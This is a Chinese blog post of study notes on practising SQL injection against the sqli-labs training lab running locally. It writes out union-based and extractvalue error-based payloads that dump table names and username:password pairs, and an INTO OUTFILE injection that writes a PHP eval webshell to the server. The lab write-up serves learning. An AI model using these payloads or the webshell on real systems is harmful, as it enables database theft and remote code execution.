网络渗透学习笔记——SQL注入练习

最新推荐文章于 2024-08-10 21:26:27 发布
最新推荐文章于 2024-08-10 21:26:27 发布
阅读量669 收藏 30
点赞数 11
文章标签: 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58742048/article/details/140939097
版权

前言

        最近也是学到渗透这块了,目前使用sqli-labs这一靶场进行了一些联系,记录一下练习过程。
        这里给出相关的文件:

        GitHub:https://github.com/skyblueee/sqli-labs-php7
        gitee:https://gitee.com/tao-guoqing/sqli-labs-php7

靶场部署

部署流程

        最近因电脑原因,重装系统后准备装个双系统试试,但出了点还没解决的问题,这里我使用PHPstudy进行部署。

        这里给出PHPstudy下载地址:https://www.xp.cn/

        

将sqli-labs解压后放入PHPstudy下的目录即可 

在配置好后对sqli-labs进行修改,在sql-connections/db-creds.inc修改自己的mysql用户名和密码 

这里PHPstudy自带的Mysql默认的用户名与密码均为root

修改完成后浏览器网址输入127.0.0.1/sqli-labs-php7-master即可进入靶场

抑或是在PHPstudy中直接打开网址

 

部署成功界面

 关卡流程

Less1

这里先根据提示使用get进行注入测试 

 这里返回了SQL错误提示,可以判断出此处有注入点,此处可使用单引号进行注入。

这里使用union select或是使用order by来检测列数

之后便可以使用database()进行爆破,以获取表名

现在我们可以知道表名为security,以此为基础使用table_name得到表中的字段名 

?id=-1' union select 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema='security' and table_name='users' -- a

再通过获取的字段名获取具体数据

?id=-1' Union Select 1,2,group_concat(concat_ws(':',username,password))FROM security.users -- a

Less2 

展示界面与Less1相同

使用?id= -1' union select 1,2,3 -- a注入后报错

经过测试后判断为Integer类型参数 ,数值型的参数后面无需单引号,字符串型才需要补,这里去掉单引号

?id= -1 union select 1,2,3 -- a

成功获取结果

 后续操作同Less1,不在赘述。

Less3

正常注入报错

此处需注意到提示的报错信息输入数据后多了个括号

说明需要正确补全

?id= -1') union select 1,2,3 -- a

成功查询

Less4

本关形同Less3,需要补全'")

? id=-1'") union select 1,2,database() -- a 

 

Less5 

尝试爆破注入

使用database()进行爆库

?id=' union select extractvalue(1,concat('~','~',database())) -- a 

爆表

?id=' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~')) -- a

爆破数据

?id=' and extractvalue(1,concat('~',(select group_concat(username) from security.users),'~')) -- a

Less6

 

查看报错

 

爆库 

?id=" union select extractvalue(1,concat('~',database(),'~')) -- a 

剩余步骤参照Less5

Less7 

提示使用文件进行注入

        mysql读写文件需要更改mysql配置,找到mysql里的my.ini,在[mysqld]中加入 secure-file-priv= 保存并重启mysql即可

使用basedir()与datadir()获取路径

basedir()指定了安装MYSQL的安装路径

datadir()指定了安装MYSQL的数据文件路径

使用本漏洞需要满足

  1. mysql的用户权限必须为root
  2. 知道网站的物理路径
  3. 在variables里的secure_file_priv参数必须是什么都没有的情况

爆库

?id=1')) union select 1,database(),3 into outfile "C:\\PHPstudy\\WWW\\sqli-labs-master\\Less-7\\database.txt" -- a

这会在服务器生成查询结果,但是咱们拿不到(

使用php的一句话木马进行注入

?id=1')) union select 1,'<?php @eval($_POST["abc"]);?>',3 into outfile "E:\\PHPstudy\\WWW\\sqli-labs-master\\Less-7\\muma.php" -- a

好!木马直接被ban掉(

 Less8

使用burp suite来进行抓包操作,暴力破解数据库 

burp suite出现错误,本题及后续没搞出来,进行一个快速的跳过,剩下的题目后面再补叭( 

若光光
关注
  • 11
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MYSQL 通过ExtractValue()报错注入
Ciyaso的博客
01-18 4058
函数解释: extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是String格式,为XML文档对象的名称   第二个参数:XPath_string (Xpath格式的字符串)   concat:返回结果为连接参数产生的字符串。 报错原理 例如:SELECT ExtractValue('<a><b><b/></a&gt
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 4938
以pikachu靶场练习学习ctf知识
WEB渗透学习笔记4——堆叠注入和二次注入
林林木林林L的博客
07-24 2216
堆叠查询注入攻击 Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 unioninjection(
SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3514
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3023
Vulnhub靶机渗透学习——DC-9
网络安全(黑客)——自学笔记
xv7676的博客
05-29 954
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
2020v6自学笔记web漏洞之sql注入
qq_36585338的博客
07-23 650
在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL 语句大概写法也能更好的选择对应的注入语句。
网络安全(黑客)——自学手册
xv7676的博客
05-28 904
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)——2024自学手册
xv7676的博客
06-05 1180
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
学习笔记——sql.zip
06-08
"学习笔记——sql.zip"这个压缩包文件很可能包含了关于SQL的学习资料,如教程、笔记、示例代码等,旨在帮助用户掌握SQL的基本概念、语法和高级特性。 首先,SQL的基础知识包括数据类型,如整型(INT)、浮点型...
SQL学习笔记——表结构转换查询
01-21
1、纵表转横表 建表 --先调用自建的数据库再建表 use ljh create table sc( sname char(20), course char(20), score int) --随机插入几个记录 insert into sc values('张三','语文',98), ('张三','数学',89), ...
AI学习笔记——卷积神经网络(CNN)
02-24
上篇文章简单地地介绍了神经网络和深度学习,在神经网络中,每一层的每个神经元都与下一层的每个神经元相连(如下图),这种连接关系叫全连接(FullConnected)。如果以图像识别为例,输入就是是每个像素点,那么每一...
【Sklearn学习】Sklearn的数据集介绍
一条咸鱼
08-07 663
sklearn数据集的介绍,方便后面学习使用的对应的数据集。
日常学习--20240806
xxm13679073037的博客
08-07 798
调优
Zero123++ 论文学习
calvinpaean的博客
08-07 1073
随着新视图生成模型的涌现,3D 内容生成领域取得了显著进展,这些模型利用了强大的 2D 扩散生成先验知识,这些 2D 扩散模型是在互联网上的大规模数据集训练得到的。如果没有全局条件,针对可见区域生成的内容还是不错的,但是对于不可见区域,则生成质量就急剧下降了,因为模型缺乏推理物体的全局语义的能力。Reference Attention 指的就是,在对模型的输入去噪时,对一个额外的参考图像使用去噪 UNet 模型,并将参考图像中得到的自注意力 key 矩阵和 value 矩阵附加到去噪模型的相应的注意力层。
【IC设计】昇腾910架构学习
最新发布
VICI的博客
08-10 151
昇腾910是华为的AI训练卡,基于7nm EUV工艺,其中有16个基于ARMv8定制的CPU,32个Ascend-Max AI加速器,使用4*6的无缓存NoC Mesh进行互联,使用HBM(High Bandwidth Memory)进行存储,提供128通道的视频译码器。本文内容是参考华为公开资料形成的个人观点,无侵权行为,内容仅供学习
【OpenCV C++20 学习笔记】给图片加边框-copyMakeBorder
TeamLee的博客
08-06 624
简单介绍在OpenCV中如何用copyMakeBorder的方法给图片添加边框
【GCC】结合GPT4 延迟梯度学习2:延迟梯度的计算及阈值更新
突围
08-06 96
拥塞控制
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值